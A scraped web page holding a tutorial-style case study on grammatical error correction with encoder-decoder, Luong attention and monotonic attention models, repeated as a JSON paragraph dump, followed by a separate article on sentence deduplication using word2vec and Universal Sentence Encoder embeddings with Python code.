Normalization and Translation Corpus Both these datasets are publicly available if you are interested to work with them. This is a Japanese website that works towards language learning. Users are able to post in the language(s) they are learning and that post will appear to native speakers of that language for correction. The dataset from this website has data in the following column separated by \t : Number of correction Serial number Sentence number 0 is the title Sentence written by a learner of English Corrected Sentences (If exists) Out of this we have extracted input sentence and corrected sentence pairs for those data points for which both these sentences exists. This is the dataset by the National University of Singapore (NUS) which is social media data text data. The dataset size is 2000 data points. The data in its raw form has three rows for each datapoint. The first row is the social media text The second row is the correct formal English translated text The third row is the Chinese translated data. Out of these, we can use the first two rows of each data point for our problem. Once we have extracted the data in the required form now is a very integral step which is Exploratory Data Analysis which is an opportunity to understand and develop a good sense of the dataset. I have extracted and preprocessed the dataset in a required form which will be discussed in the next section. First, we will gather overall information about the dataset like the number of data points, datatypes, mean or median values of numerical data, etc. # TOTAL DATAPOINTSdf.shape# CHECK FOR NULL VALUESdf.info() So there are around 500k data points and no null values are present. We have two columns in the dataset one is input and the other is output or target. Let's see one by one the analysis for each column. The input is a text feature we can analyze the distribution for the length of the text and the distribution of the number of words. The distribution for the length of characters and the number of words in the input is highly skewed. Both the distributions almost follow the same pattern. The number of characters in the input could go as high as 2000 and words are up to 400 words. The ratio of the higher length of words or characters is significantly less. More than 99 percent of inputs have a number of characters less than 200 and a number of words less than 50. The same is done for the output text also. And surprisingly the observations for the input text hold true for output text also. Word Cloud is a great visualization to know the most frequently occurring words in the total text. The most common words in both the text are: think want today Japan English Here wrong words are those words that are present in input but not present in target sentences and Corrected words are those that are present in target sentences but not present in input sentences. I have extracted all these words and done a word cloud analysis on them. After observing the incorrect and corrected words images we can observe the change in the form of the verb that is being used. go ==> goinggo ==> wentstudy ==> studyinguse ==> using In this part of the analysis, we will associate the words with their parts of speech and plot the top 10 most occurring parts of speech. Following are the plots: This shows part of speech being used a maximum number of times is Noun(NN) followed by Preposition(IN). The overall numbers of parts of speech remain the same for input and output sentences but the numbers vary in NNS(Noun, plural) and PRP(personal pronouns) Now we will see how to remove the unwanted data from our dataset. We know that the data is in text format therefore all the special characters, unwanted spaces need to be removed and the decontraction of contracted words is to be done. We are also going to convert all the text into lower to reduce the complexity of the problem. The following code is followed to do all the above-mentioned operations: Following this, we can also follow some other operations is removing null values and deduplication which are available in the pandas library. Before we feed our data to the DL model it needs to be converted to a form which the machine can understand. So for this problem, we are going to use tokenization and padding to convert the dataset into a sequence of integers of the same length. While forming the data pipeline for the model we are going to pad the sequence to form the length of all the data points equal. The maximum length used for the padding is the 99th percentile of the distribution of the number of words. The data has to be converted into batches so as to input it into the deep learning model. The following code is used to form the pipeline for the dataset For the benchmark solution, I am going to the vanilla sequence to sequence model which is also known as Encoder-Decoder Model. This model takes input in a sequence form and predicts another sequence as output. Due to this, it has many applications in Machine Translation Problems. The following code is used to form Encoder-Decoder layers in the model. This is a really good blog to get an insight into the Encoder-Decoder models. I have tried many variations of Vanilla Encoder-Decoder models like using pre-trained embeddings of Word2Vec and FastText, you can check them out at my GitHub profile. After experimenting with these models, I found that for my case trainable embeddings are working better than pre-trained ones, therefore it would be used for the advanced models. The BLUE score achieved for Encoder-Decoder for our dataset is 0.4603. Attention Mechanism is a very ingenious idea in Machine Learning which clones the humanistic way of grasping information. Moreover, there are also certain disadvantages of the simple encoder-decoder model which the Attention Model overcomes. Some of the popular attention mechanism techniques used today are Bahdanau Attention Mechanism, Loung Attention Mechanism. Let me give a brief idea about the steps of the Loung Attention Mechanism which I have used extensively in my case study. To be specific this idea is known as the Global Attention Mechanism. The encoder part remains the same as the vanilla encoder-decoder, which outputs the hidden states of the input sequence. Now in the decoder part for every time step we have to compute something called a Context Vector. This context vector holds the relevant information from the encoder about the words which is to be predicted in that time step. It may sound complex but once you know how it is computed everything will fall in place. First, when we achieve all encoder hidden states(ht) and decoder previous hidden(hs) from an RNN we find the alpha values(). In the paper, Loung and others provided three alternatives for computing the score. Once the alpha values are computed the context vector is calculated as the weighted average over all the encoder hidden states with the weights being the alpha values. Given the target hidden state and the source side context vector simple concatenation layers if used to combine the information from both vectors to produce attention hidden state as follows: The attentional vector h ̃t is then fed through the softmax layer to produce the next word in sequence. This type of attention mechanism is called Global Attention Mechanism because all the hidden states of the encoder are considered at every time step of decoder to produce the context vector. In this case study, I have implemented Loung Attention Mechanism from scratch through Model Subclassing. Below is the code for the Attention layer for Dot type scoring. For full code, you refer to my GitHub profile. The performance metric for Attention models is significantly better than our benchmark models. BLEU ScoreDot Scoring 0.5055General Scoreing 0.5545Concat Scoreing 0.5388 Before we get into the details for Monotonic Attention let us see some drawbacks of simple attention mechanism and what was the need of monotonic attention. We know in attention mechanisms at each decoder time step all the encoder hidden states need to be referred to. This creates a quadratic time complexity which hinders its use in online settings. Therefore to overcome this disadvantage the concept of Monotonic Attention is introduced which simply says that there is no need to inspect all the attention weights at each time step. We are going to inspect the hidden states in a specific order (from left to right in English) and one of the hidden states is selected as the context vector at every time step. Once a particular entry is inspected then it will not be inspected in the next time step. The most important advantage for this approach is the linear time complexity and thus could be used for online settings. Here we are going to implement a very simple type of monotonic attention as explained in this blog and paper. This has to be kept in mind that the changes would only occur in the attention layer but the encoder and decoder layer will remain the same. These are the steps for monotonic attention: Given the previous hidden states, we are going to compute the score or energy for which we are going to use the same methods as used above in the Loung attention mechanism. After the score is computed it is converted to probabilities through with sigmoid function. The attention for the present time step is computed by this formula: Once we get the attention weights we follow the similar steps of computing the weighted sum to get the context vector and concatenate it to the hidden state of the decoder to pass through the softmax layer. In this case study, I have implemented only one variation of the monotonic attention layer. For more information refer to the blog and code by Colin Raffel where he has given the complete implementation of this layer. The performance of monotonic attention is comparable to simple attention but as mentioned in the paper it provides some advantage in the time complexity. If you know about the sequence to sequence models then you would be aware of the fact that we have to make certain changes with the model to predict the required output at the inference time. Again for that, we have two options one is known as Greedy Search and the other is Beam Search. Let us see both of them one by one. In greedy search for every time step, we consider the token with maximum probability and ignore all the remaining tokens even though they have comparable values of probabilities after the softmax layer. In the code, you can see the argmax function on the output of the dense softmax activation layer. This has a disadvantage because if any of the predicted words at a time step is wrong the result of future time steps will also get affected. A better way of prediction is BEAM Search in which at each time step there is a choice provided for topmost probable tokens which have numbers equal to with BEAM Width and the total score for each of the predicted sequences is equal to the product of the probabilities for each word in the sequence. For this case study, I have taken the beam width equal to 3. For more insights, you can go through this blog. For this case study, I have tried a total of 12 models with certain variations. Below are the results. The results of the attention mechanism are better than the simple encoder-decoder and among the attention model, the performance does not differ much. We can also observe that the BLEU score for beam search is better than the greedy search as expected. I have done the Model Deployment for the Monotonic Attention model which is computing the score with the dot product. You can check out the model at this link. Some of the predictions for the above model are as follows : For future work, I would love to work with other variations of the Monotonic Attention mechanism. If a better dataset is available publically that could really improve the model performance. I have tried to give a brief on the work I have done in this project. If you want to see the full detailed code where I have commented on each and every line, check out my Github repository. Feel free to connect on Linkedin. If you have reached it so far, help me to improve the content by leaving a comment. That would mean a lot to me :) https://colinraffel.com/blog/online-and-linear-time-attention-by-enforcing-monotonic-alignments.html Project under the guidance of Hina Sharma at Applied AI Course: https://www.appliedaicourse.com/course/11/Applied-Machine-learning-course Loung Attention Paper: https://arxiv.org/pdf/1508.04025.pdf Monotonic Attention Paper: https://arxiv.org/pdf/1409.0473.pdf Implementation of Monotonic Attention: https://github.com/craffel/mad/blob/b3687a70615044359c8acc440e43a5e23dc58309/example_decoder.py#L22 Blog by Rishang Prashnani
[ { "code": null, "e": 564, "s": 172, "text": "IntroductionProblem DefinitionPrerequisitesData SourceUnderstanding the dataExploratory Data AnalysisData PreprocessingData Preparation and Data PipelineBenchmark Solution(Vanilla Encoder-Decoder Model)Attention MechanismMonotonic AttentionInference (Greedy Search VS BEAM Search)Results and Model ComparisonModel Deployment and PredictionsFuture WorkGithub Repository and LinkedinReferences" }, { "code": null, "e": 577, "s": 564, "text": "Introduction" }, { "code": null, "e": 596, "s": 577, "text": "Problem Definition" }, { "code": null, "e": 610, "s": 596, "text": "Prerequisites" }, { "code": null, "e": 622, "s": 610, "text": "Data Source" }, { "code": null, "e": 645, "s": 622, "text": "Understanding the data" }, { "code": null, "e": 671, "s": 645, "text": "Exploratory Data Analysis" }, { "code": null, "e": 690, "s": 671, "text": "Data Preprocessing" }, { "code": null, "e": 725, "s": 690, "text": "Data Preparation and Data Pipeline" }, { "code": null, "e": 775, "s": 725, "text": "Benchmark Solution(Vanilla Encoder-Decoder Model)" }, { "code": null, "e": 795, "s": 775, "text": "Attention Mechanism" }, { "code": null, "e": 815, "s": 795, "text": "Monotonic Attention" }, { "code": null, "e": 856, "s": 815, "text": "Inference (Greedy Search VS BEAM Search)" }, { "code": null, "e": 885, "s": 856, "text": "Results and Model Comparison" }, { "code": null, "e": 918, "s": 885, "text": "Model Deployment and Predictions" }, { "code": null, "e": 930, "s": 918, "text": "Future Work" }, { "code": null, "e": 961, "s": 930, "text": "Github Repository and Linkedin" }, { "code": null, "e": 972, "s": 961, "text": "References" }, { "code": null, "e": 1322, "s": 972, "text": "Grammatical Error Correction as the name suggests is the process by which the detection and correction to an error in the text are done. The problem seems easy to understand but is actually tough due to the diverse vocabulary and set of rules in a language. In addition, we are not only going to identify the mistake but correction is also required." }, { "code": null, "e": 1535, "s": 1322, "text": "There are immense applications to this problem, the reason being writing is a very common means to share ideas and information. This could help the writer to speed up their work with very minimal chance of error." }, { "code": null, "e": 1714, "s": 1535, "text": "Moreover, there could be many individuals who are not fluent in a particular language. Therefore, these types of models make sure that language is not a barrier in communication." }, { "code": null, "e": 2086, "s": 1714, "text": "Now we shall define the task at hand into a machine learning problem. The problem that we are dealing is a type of NLP (Natural Language Processing) problem. NLP is the field of Machine Learning which deals with the interaction between human languages and computers. I would recommend going through this paper to know the progress of approaches used to solve the problem." }, { "code": null, "e": 2330, "s": 2086, "text": "The approach that we are going to look into is the Sequence to Sequence model. In short out, the deep learning model is going to receive a sequence (incorrect text in this case) and it will output another sequence(corrected text in this case)." }, { "code": null, "e": 2604, "s": 2330, "text": "Now we have defined our problem into a machine learning problem, there is another very integral idea that needs to be dealt with that is performance metric. Performance Metric is a mathematical measure that helps to understand the performance of our machine learning model." }, { "code": null, "e": 2821, "s": 2604, "text": "A very popular performance metric for the NLP problems is BLEU (Bilingual Evaluation Understudy) Score, hence we are going to use it for our model also. You can refer to this video to know more about the BLEU scores." }, { "code": null, "e": 3049, "s": 2821, "text": "Before we go into the details of this case study, I assume that the readers know the concepts for Machine Learning and Deep Learning. To be specific, the ideas of LSTMs, Encoder-Decoders, Attention Mechanism should be familiar." }, { "code": null, "e": 3104, "s": 3049, "text": "I will try to provide some good references on the way." }, { "code": null, "e": 3321, "s": 3104, "text": "As I mentioned above the problem is tough to handle to which one of the reasons is the nonavailability of a good quality dataset. In my research, I found some of them useful and considered the following two datasets." }, { "code": null, "e": 3394, "s": 3321, "text": "Lang-8 DatasetNUS Social Media Text Normalization and Translation Corpus" }, { "code": null, "e": 3409, "s": 3394, "text": "Lang-8 Dataset" }, { "code": null, "e": 3468, "s": 3409, "text": "NUS Social Media Text Normalization and Translation Corpus" }, { "code": null, "e": 3552, "s": 3468, "text": "Both these datasets are publicly available if you are interested to work with them." }, { "code": null, "e": 3836, "s": 3552, "text": "This is a Japanese website that works towards language learning. Users are able to post in the language(s) they are learning and that post will appear to native speakers of that language for correction. The dataset from this website has data in the following column separated by \\t :" }, { "code": null, "e": 3857, "s": 3836, "text": "Number of correction" }, { "code": null, "e": 3871, "s": 3857, "text": "Serial number" }, { "code": null, "e": 3887, "s": 3871, "text": "Sentence number" }, { "code": null, "e": 3902, "s": 3887, "text": "0 is the title" }, { "code": null, "e": 3943, "s": 3902, "text": "Sentence written by a learner of English" }, { "code": null, "e": 3975, "s": 3943, "text": "Corrected Sentences (If exists)" }, { "code": null, "e": 4110, "s": 3975, "text": "Out of this we have extracted input sentence and corrected sentence pairs for those data points for which both these sentences exists." }, { "code": null, "e": 4312, "s": 4110, "text": "This is the dataset by the National University of Singapore (NUS) which is social media data text data. The dataset size is 2000 data points. The data in its raw form has three rows for each datapoint." }, { "code": null, "e": 4351, "s": 4312, "text": "The first row is the social media text" }, { "code": null, "e": 4412, "s": 4351, "text": "The second row is the correct formal English translated text" }, { "code": null, "e": 4458, "s": 4412, "text": "The third row is the Chinese translated data." }, { "code": null, "e": 4538, "s": 4458, "text": "Out of these, we can use the first two rows of each data point for our problem." }, { "code": null, "e": 4733, "s": 4538, "text": "Once we have extracted the data in the required form now is a very integral step which is Exploratory Data Analysis which is an opportunity to understand and develop a good sense of the dataset." }, { "code": null, "e": 4843, "s": 4733, "text": "I have extracted and preprocessed the dataset in a required form which will be discussed in the next section." }, { "code": null, "e": 4992, "s": 4843, "text": "First, we will gather overall information about the dataset like the number of data points, datatypes, mean or median values of numerical data, etc." }, { "code": null, "e": 5051, "s": 4992, "text": "# TOTAL DATAPOINTSdf.shape# CHECK FOR NULL VALUESdf.info()" }, { "code": null, "e": 5120, "s": 5051, "text": "So there are around 500k data points and no null values are present." }, { "code": null, "e": 5254, "s": 5120, "text": "We have two columns in the dataset one is input and the other is output or target. Let's see one by one the analysis for each column." }, { "code": null, "e": 5386, "s": 5254, "text": "The input is a text feature we can analyze the distribution for the length of the text and the distribution of the number of words." }, { "code": null, "e": 5487, "s": 5386, "text": "The distribution for the length of characters and the number of words in the input is highly skewed." }, { "code": null, "e": 5542, "s": 5487, "text": "Both the distributions almost follow the same pattern." }, { "code": null, "e": 5636, "s": 5542, "text": "The number of characters in the input could go as high as 2000 and words are up to 400 words." }, { "code": null, "e": 5713, "s": 5636, "text": "The ratio of the higher length of words or characters is significantly less." }, { "code": null, "e": 5822, "s": 5713, "text": "More than 99 percent of inputs have a number of characters less than 200 and a number of words less than 50." }, { "code": null, "e": 5865, "s": 5822, "text": "The same is done for the output text also." }, { "code": null, "e": 5950, "s": 5865, "text": "And surprisingly the observations for the input text hold true for output text also." }, { "code": null, "e": 6049, "s": 5950, "text": "Word Cloud is a great visualization to know the most frequently occurring words in the total text." }, { "code": null, "e": 6093, "s": 6049, "text": "The most common words in both the text are:" }, { "code": null, "e": 6099, "s": 6093, "text": "think" }, { "code": null, "e": 6104, "s": 6099, "text": "want" }, { "code": null, "e": 6110, "s": 6104, "text": "today" }, { "code": null, "e": 6116, "s": 6110, "text": "Japan" }, { "code": null, "e": 6124, "s": 6116, "text": "English" }, { "code": null, "e": 6395, "s": 6124, "text": "Here wrong words are those words that are present in input but not present in target sentences and Corrected words are those that are present in target sentences but not present in input sentences. I have extracted all these words and done a word cloud analysis on them." }, { "code": null, "e": 6522, "s": 6395, "text": "After observing the incorrect and corrected words images we can observe the change in the form of the verb that is being used." }, { "code": null, "e": 6577, "s": 6522, "text": "go ==> goinggo ==> wentstudy ==> studyinguse ==> using" }, { "code": null, "e": 6739, "s": 6577, "text": "In this part of the analysis, we will associate the words with their parts of speech and plot the top 10 most occurring parts of speech. Following are the plots:" }, { "code": null, "e": 6843, "s": 6739, "text": "This shows part of speech being used a maximum number of times is Noun(NN) followed by Preposition(IN)." }, { "code": null, "e": 6998, "s": 6843, "text": "The overall numbers of parts of speech remain the same for input and output sentences but the numbers vary in NNS(Noun, plural) and PRP(personal pronouns)" }, { "code": null, "e": 7401, "s": 6998, "text": "Now we will see how to remove the unwanted data from our dataset. We know that the data is in text format therefore all the special characters, unwanted spaces need to be removed and the decontraction of contracted words is to be done. We are also going to convert all the text into lower to reduce the complexity of the problem. The following code is followed to do all the above-mentioned operations:" }, { "code": null, "e": 7543, "s": 7401, "text": "Following this, we can also follow some other operations is removing null values and deduplication which are available in the pandas library." }, { "code": null, "e": 7789, "s": 7543, "text": "Before we feed our data to the DL model it needs to be converted to a form which the machine can understand. So for this problem, we are going to use tokenization and padding to convert the dataset into a sequence of integers of the same length." }, { "code": null, "e": 8024, "s": 7789, "text": "While forming the data pipeline for the model we are going to pad the sequence to form the length of all the data points equal. The maximum length used for the padding is the 99th percentile of the distribution of the number of words." }, { "code": null, "e": 8178, "s": 8024, "text": "The data has to be converted into batches so as to input it into the deep learning model. The following code is used to form the pipeline for the dataset" }, { "code": null, "e": 8459, "s": 8178, "text": "For the benchmark solution, I am going to the vanilla sequence to sequence model which is also known as Encoder-Decoder Model. This model takes input in a sequence form and predicts another sequence as output. Due to this, it has many applications in Machine Translation Problems." }, { "code": null, "e": 8531, "s": 8459, "text": "The following code is used to form Encoder-Decoder layers in the model." }, { "code": null, "e": 8609, "s": 8531, "text": "This is a really good blog to get an insight into the Encoder-Decoder models." }, { "code": null, "e": 8777, "s": 8609, "text": "I have tried many variations of Vanilla Encoder-Decoder models like using pre-trained embeddings of Word2Vec and FastText, you can check them out at my GitHub profile." }, { "code": null, "e": 8956, "s": 8777, "text": "After experimenting with these models, I found that for my case trainable embeddings are working better than pre-trained ones, therefore it would be used for the advanced models." }, { "code": null, "e": 9027, "s": 8956, "text": "The BLUE score achieved for Encoder-Decoder for our dataset is 0.4603." }, { "code": null, "e": 9392, "s": 9027, "text": "Attention Mechanism is a very ingenious idea in Machine Learning which clones the humanistic way of grasping information. Moreover, there are also certain disadvantages of the simple encoder-decoder model which the Attention Model overcomes. Some of the popular attention mechanism techniques used today are Bahdanau Attention Mechanism, Loung Attention Mechanism." }, { "code": null, "e": 9583, "s": 9392, "text": "Let me give a brief idea about the steps of the Loung Attention Mechanism which I have used extensively in my case study. To be specific this idea is known as the Global Attention Mechanism." }, { "code": null, "e": 10019, "s": 9583, "text": "The encoder part remains the same as the vanilla encoder-decoder, which outputs the hidden states of the input sequence. Now in the decoder part for every time step we have to compute something called a Context Vector. This context vector holds the relevant information from the encoder about the words which is to be predicted in that time step. It may sound complex but once you know how it is computed everything will fall in place." }, { "code": null, "e": 10144, "s": 10019, "text": "First, when we achieve all encoder hidden states(ht) and decoder previous hidden(hs) from an RNN we find the alpha values()." }, { "code": null, "e": 10228, "s": 10144, "text": "In the paper, Loung and others provided three alternatives for computing the score." }, { "code": null, "e": 10396, "s": 10228, "text": "Once the alpha values are computed the context vector is calculated as the weighted average over all the encoder hidden states with the weights being the alpha values." }, { "code": null, "e": 10588, "s": 10396, "text": "Given the target hidden state and the source side context vector simple concatenation layers if used to combine the information from both vectors to produce attention hidden state as follows:" }, { "code": null, "e": 10692, "s": 10588, "text": "The attentional vector h ̃t is then fed through the softmax layer to produce the next word in sequence." }, { "code": null, "e": 10883, "s": 10692, "text": "This type of attention mechanism is called Global Attention Mechanism because all the hidden states of the encoder are considered at every time step of decoder to produce the context vector." }, { "code": null, "e": 11099, "s": 10883, "text": "In this case study, I have implemented Loung Attention Mechanism from scratch through Model Subclassing. Below is the code for the Attention layer for Dot type scoring. For full code, you refer to my GitHub profile." }, { "code": null, "e": 11194, "s": 11099, "text": "The performance metric for Attention models is significantly better than our benchmark models." }, { "code": null, "e": 11302, "s": 11194, "text": " BLEU ScoreDot Scoring 0.5055General Scoreing 0.5545Concat Scoreing 0.5388" }, { "code": null, "e": 11459, "s": 11302, "text": "Before we get into the details for Monotonic Attention let us see some drawbacks of simple attention mechanism and what was the need of monotonic attention." }, { "code": null, "e": 11654, "s": 11459, "text": "We know in attention mechanisms at each decoder time step all the encoder hidden states need to be referred to. This creates a quadratic time complexity which hinders its use in online settings." }, { "code": null, "e": 12106, "s": 11654, "text": "Therefore to overcome this disadvantage the concept of Monotonic Attention is introduced which simply says that there is no need to inspect all the attention weights at each time step. We are going to inspect the hidden states in a specific order (from left to right in English) and one of the hidden states is selected as the context vector at every time step. Once a particular entry is inspected then it will not be inspected in the next time step." }, { "code": null, "e": 12227, "s": 12106, "text": "The most important advantage for this approach is the linear time complexity and thus could be used for online settings." }, { "code": null, "e": 12523, "s": 12227, "text": "Here we are going to implement a very simple type of monotonic attention as explained in this blog and paper. This has to be kept in mind that the changes would only occur in the attention layer but the encoder and decoder layer will remain the same. These are the steps for monotonic attention:" }, { "code": null, "e": 12696, "s": 12523, "text": "Given the previous hidden states, we are going to compute the score or energy for which we are going to use the same methods as used above in the Loung attention mechanism." }, { "code": null, "e": 12788, "s": 12696, "text": "After the score is computed it is converted to probabilities through with sigmoid function." }, { "code": null, "e": 12857, "s": 12788, "text": "The attention for the present time step is computed by this formula:" }, { "code": null, "e": 13064, "s": 12857, "text": "Once we get the attention weights we follow the similar steps of computing the weighted sum to get the context vector and concatenate it to the hidden state of the decoder to pass through the softmax layer." }, { "code": null, "e": 13282, "s": 13064, "text": "In this case study, I have implemented only one variation of the monotonic attention layer. For more information refer to the blog and code by Colin Raffel where he has given the complete implementation of this layer." }, { "code": null, "e": 13436, "s": 13282, "text": "The performance of monotonic attention is comparable to simple attention but as mentioned in the paper it provides some advantage in the time complexity." }, { "code": null, "e": 13628, "s": 13436, "text": "If you know about the sequence to sequence models then you would be aware of the fact that we have to make certain changes with the model to predict the required output at the inference time." }, { "code": null, "e": 13760, "s": 13628, "text": "Again for that, we have two options one is known as Greedy Search and the other is Beam Search. Let us see both of them one by one." }, { "code": null, "e": 13963, "s": 13760, "text": "In greedy search for every time step, we consider the token with maximum probability and ignore all the remaining tokens even though they have comparable values of probabilities after the softmax layer." }, { "code": null, "e": 14061, "s": 13963, "text": "In the code, you can see the argmax function on the output of the dense softmax activation layer." }, { "code": null, "e": 14203, "s": 14061, "text": "This has a disadvantage because if any of the predicted words at a time step is wrong the result of future time steps will also get affected." }, { "code": null, "e": 14503, "s": 14203, "text": "A better way of prediction is BEAM Search in which at each time step there is a choice provided for topmost probable tokens which have numbers equal to with BEAM Width and the total score for each of the predicted sequences is equal to the product of the probabilities for each word in the sequence." }, { "code": null, "e": 14613, "s": 14503, "text": "For this case study, I have taken the beam width equal to 3. For more insights, you can go through this blog." }, { "code": null, "e": 14716, "s": 14613, "text": "For this case study, I have tried a total of 12 models with certain variations. Below are the results." }, { "code": null, "e": 14867, "s": 14716, "text": "The results of the attention mechanism are better than the simple encoder-decoder and among the attention model, the performance does not differ much." }, { "code": null, "e": 14969, "s": 14867, "text": "We can also observe that the BLEU score for beam search is better than the greedy search as expected." }, { "code": null, "e": 15129, "s": 14969, "text": "I have done the Model Deployment for the Monotonic Attention model which is computing the score with the dot product. You can check out the model at this link." }, { "code": null, "e": 15190, "s": 15129, "text": "Some of the predictions for the above model are as follows :" }, { "code": null, "e": 15288, "s": 15190, "text": "For future work, I would love to work with other variations of the Monotonic Attention mechanism." }, { "code": null, "e": 15381, "s": 15288, "text": "If a better dataset is available publically that could really improve the model performance." }, { "code": null, "e": 15606, "s": 15381, "text": "I have tried to give a brief on the work I have done in this project. If you want to see the full detailed code where I have commented on each and every line, check out my Github repository. Feel free to connect on Linkedin." }, { "code": null, "e": 15721, "s": 15606, "text": "If you have reached it so far, help me to improve the content by leaving a comment. That would mean a lot to me :)" }, { "code": null, "e": 15822, "s": 15721, "text": "https://colinraffel.com/blog/online-and-linear-time-attention-by-enforcing-monotonic-alignments.html" }, { "code": null, "e": 15960, "s": 15822, "text": "Project under the guidance of Hina Sharma at Applied AI Course: https://www.appliedaicourse.com/course/11/Applied-Machine-learning-course" }, { "code": null, "e": 16020, "s": 15960, "text": "Loung Attention Paper: https://arxiv.org/pdf/1508.04025.pdf" }, { "code": null, "e": 16083, "s": 16020, "text": "Monotonic Attention Paper: https://arxiv.org/pdf/1409.0473.pdf" }, { "code": null, "e": 16222, "s": 16083, "text": "Implementation of Monotonic Attention: https://github.com/craffel/mad/blob/b3687a70615044359c8acc440e43a5e23dc58309/example_decoder.py#L22" } ]
Deduplication Deduplication. Deduplication of text is an application... | by Abhijith C | Towards Data Science
deduplication/diːˌdjuːplɪˈkeɪʃ(ə)n/ nounthe elimination of duplicate or redundant information, especially in computer data. "deduplication removes the repetitive information before storing it" As the definition says, the task we are trying to do is to remove the duplicate texts/sentences and so on. This is nothing but the act of checking how similar the text is to one another. They can be exactly identical like: Deep Learning is Awesome! and Deep Learning is Awesome!. Or, they could be quite similar to one another in terms of what the sentence tries to convey, like: Deep Learning is Awesome! and Deep Learning is so cool. We know that these two sentences convey the same thing, and this is what we want our machines to capture. Such a task in literature is referred to as Semantic Text Similarity(STS). It deals with determining how similar two pieces of texts are. This would include not just the syntactic similarity, that is how similar or same are the words that are used in the two sentence, but also the semantic similarity that captures the similarity in what is being conveyed using the two sentences, i.e the meaning of the text plays an important role in determining what is similar and not similar. The problem. Yes, that’s our main goal. To solve the problem. Let me give you an example. Say, you have to send really funny jokes (your joke could be a sentence or a bunch of sentences) to a group of people over e-mail (LOL!), and your boss asks you to make sure that people don’t receive same kind of jokes. So you have to make sure that all the jokes you have are unique and people don’t get bored with the content. What a job, seriously? You, being a kick-ass coder, decide to automate this task. You have this magical API that gives you a lot of jokes for free and you write a script to mail the jokes to that group of people your boss loves. But, we can’t really trust this magical API, can we? It’s magical. What if the API gives you similar jokes? You can’t risk upsetting your boss.This is where you can use a deduplication engine that makes sure that no joke sent is similar to any that was sent in the past. My primary aim here is not to talk a lot about these models. But to help you use them for a practical task, something like the one that is stated above. I admit that sending jokes to people in order to impress your boss isn’t really practical. Let’s try to break this down into how this similarity measurement is defined and between what two entities we are trying to find the similarity (literally the text as is, or something else?). Firstly, talking about the similarity measurement, there’s quite a few that can be used. Just for the sake of completeness, listing a few:1. Jaccard Similarity2. Cosine Similarity3. Earth Mover Distance4. Jensen-Shannon distance But to cut to the chase, we’ll be using Cosine Similarity. Mathematically, Cosine similarity is a measure of similarity between two vectors (non-zero) of an inner product space that measures the cosine of the angle between them. If two documents are similar and if they are far apart in the Euclidean space, they could still be pretty close to each other. This is captured by cosine distance and hence is advantageous. Secondly, where do we use this cosine distance? Between pairs of sentence strings? Nope! This is were we use the power of Natural Language Processing and Deep learning. We use vectors. A word/sentence vector is a row of real valued numbers (as opposed to dummy numbers) where each point captures a dimension of the word’s/sentence’s meaning and where semantically similar words/sentences have similar vectors. And, again, there are plenty of methods to get these vectors. To name a few:Word Embedding: word2vec, GloVe, BERT word embeddings, ELMo and so on.Sentence Embedding: BERT sentence embedding, Universal Sentence Encoder, etc. I’ll jump straight into the methods that I personally experimented with and that worked beautifully for me. word2vec + Universal Sentence Encoder To prevent this from being a pure implementation-oriented article (which it is intended to be), I’ll try to explain what these models are, very briefly. word2vec comes in two variants: Skip-Gram and Continuous Bag of Words model (CBOW). There’s plenty of material on both these variants, if you are looking for a detailed explanation. I’ll be very crisp here. The skip-gram model is a bit slower but usually does a better job with infrequent words. Hence, this is what is used often. We’ll talk briefly about this. You’ll find this diagram in almost every word2vec (Skip-Gram model) blog and tutorial. In this architecture, the model uses the current word to predict the surrounding window of context words. It weighs the nearby context words more heavily than the distant context words. Here, we look at a window of context words (2 words on each side, in this case) and try to predict the center word. Consider w(t) is the input word, the usual dot product between the weight matrix and the input vector w(t) is done by the single hidden layer. We apply the softmax function to the dot product between the output vector of the hidden layer and the weight matrix. This gives us the probabilities of the words that appear in the context of w(t) at the current word location. It’s the vectors that are present in the hidden layers that become the vector representation of that word. But these are ‘word’ embedding, and we have to find similar ‘sentences’. So, how do we get the vector representation of the sentence instead of just word embedding? One simple and trivial way (the one that I will show today) is by simply averaging the word embedding of all the words of that sentence. Simple, isn’t it? Now for the main part, let’s code this in. w2vmodel = gensim.models.KeyedVectors.load_word2vec_format('models/GoogleNews-vectors-negative300.bin.gz'), binary=True)def sent2vec(s): '''Finding word2vec vector representation of sentences @param s : sentence ''' words = str(s).lower() words = word_tokenize(words) words = [w for w in words if not w in stop_words] words = [w for w in words if w.isalpha()] featureVec = np.zeros((300,), dtype="float32") nwords = 0 for w in words: try: nwords = nwords + 1 featureVec = np.add(featureVec, w2vmodel[w]) except: continue # averaging if nwords > 0: featureVec = np.divide(featureVec, nwords) return featureVecdef get_w2v_vectors(list_text1, list_text2): ‘’’Computing the word2vec vector representation of list of sentences@param list_text1 : first list of sentences@param list_text2 : second list of sentences ‘’’ print(“Computing first vectors...”) text1_vectors = np.zeros((len(list_text1), 300)) for i, q in tqdm(enumerate(list_text1)): text1_vectors[i, :] = sent2vec(q) text2_vectors = np.zeros((len(list_text2), 300)) for i, q in tqdm(enumerate(list_text2)): text2_vectors[i, :] = sent2vec(q) return text1_vectors, text2_vectors That’s it! 🤷‍♂ You have your sentence embedding using word2vec. Google presented a series of models for encoding sentences into vectors. The authors have specifically targeted this for downstream tasks, i.e for transfer learning tasks. STS is one such task. It comes in two variants:1. One with a Transformer Encoder2. One with a Deep Averaging Network Each of them have different design goals:1. Targets high accuracy at the cost of greater model complexity and resource consumption.2. Targets efficient inference with slightly reduced accuracy. I’ve hyperlinked both these architectures with my favorite blogs that explain each of them very well. Let’s focus more on how to implement them. usemodel = hub.Module('models/sentence_encoder')def get_use_vectors(list_text1, list_text2):'''Computing the USE vector representation of list of sentences@param list_text1 : first list of sentences@param list_text2 : second list of sentences ''' print("Computing second vectors...") messages1 = list_text1 messages2 = list_text2 num_batches = math.ceil(len(messages1) / BATCH_SIZE) # Reduce logging output. tf.logging.set_verbosity(tf.logging.ERROR) message_embeddings1 = [] message_embeddings2 = [] with tf.Session() as session: session.run([tf.global_variables_initializer(), tf.tables_initializer()]) for batch in range(num_batches): print(batch * BATCH_SIZE, batch * BATCH_SIZE + BATCH_SIZE) batch_msgs1 = messages1[batch * BATCH_SIZE: batch * BATCH_SIZE + BATCH_SIZE] batch_msgs2 = messages2[batch * BATCH_SIZE: batch * BATCH_SIZE + BATCH_SIZE] message_embeddings1_temp, message_embeddings2_temp = session.run([usemodel(batch_msgs1), usemodel(batch_msgs2)]) message_embeddings1.append(message_embeddings1_temp) message_embeddings2.append(message_embeddings2_temp) all_embedding1 = np.concatenate(tuple(message_embeddings1)) all_embedding2 = np.concatenate(tuple(message_embeddings2)) return all_embedding1, all_embedding2 Again, that’s it! 🤷‍♂ Now we have the sentence embedding for your jokes from two different models. 